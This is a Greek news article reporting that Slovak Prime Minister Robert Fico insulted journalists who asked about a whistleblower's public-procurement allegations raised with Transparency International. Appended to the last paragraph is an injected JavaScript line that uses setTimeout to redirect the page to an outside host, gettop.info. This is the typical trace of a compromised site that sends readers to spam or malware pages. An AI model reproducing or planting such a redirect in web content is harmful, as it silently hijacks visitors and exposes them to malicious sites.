Έξαλλος ο Σλοβάκος πρωθυπουργός σε δημοσιογράφους: Είστε «βρωμερές πόρνες»

0
12

 

Κατά την καθιερωμένη συνέντευξη Τύπου, έπειτα από την σύγκληση του υπουργικού συμβουλίου, ο πρωθυπουργός της Σλοβακίας Ρόμπερτ Φίτσο εξοργίστηκε όταν του τέθηκε ερώτηση σχετικά με τις καταγγελίες στις οποίες προέβη την Κυριακή η Σουζάνα Χλάβκοβα αλλά και η μη κυβερνητική οργάνωση Διεθνής Διαφάνεια.

«Κάποιοι από εσάς είστε βρομερές πόρνες που στρέφεστε ενάντια της Σλοβακίας και επιμένω σε αυτό», τόνισε ο Φίτσο απευθυνόμενος στους δημοσιογράφους.

«Δεν προσφέρετε ενημέρωση, πολεμάτε την κυβέρνηση», πρόσθεσε.

Όπως υποστήριξε, ο Σλοβάκος πρωθυπουργός, οι σχετικές καταγγελίες αποτελούν μια στοχευμένη επίθεση δυσφήμισης της προεδρίας της Σλοβακίας στην ΕΕ, η οποία λήγει τον Δεκέμβριο.

Η Χλάβκοβα συμμετείχε σε μια ομάδα στο υπουργείο Εξωτερικών της χώρας και της είχε ανατεθεί η διοργάνωση πολιτιστικών γεγονότων για τον εορτασμό της σλοβακικής προεδρίας στην ΕΕ, όπως μια εκδήλωση τον Φεβρουάριο για τα αποκαλυπτήρια του λογοτύπου της σλοβακικής προεδρίας.

Σε συνέντευξη Τύπου που διεξήχθη την Δευτέρα, από κοινού με την Διεθνή Διαφάνεια, η Χλάβκοβα κατηγόρησε τους προϊσταμένους της ότι της άσκησαν πίεση για να παρακάμψει τους κανόνες για την σύναψη δημοσίων συμβάσεων και να επιλέξει ένα πρακτορείο διοργάνωσης εκδηλώσεων που σχετιζόταν με το αριστερό κόμμα Σμερ του Φίτσο για την διοργάνωση των αποκαλυπτηρίων του λογοτύπου.

Παράλληλα κατήγγειλε ότι μια συναυλία για τον εορτασμό της έναρξης της προεδρίας τον Ιούλιο διοργανώθηκε χωρίς να τηρηθούν οι κανόνες δημοσίων συμβάσεων και πως τα έξοδα διοργάνωσης της συναυλίας υπερκοστολογήθηκαν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here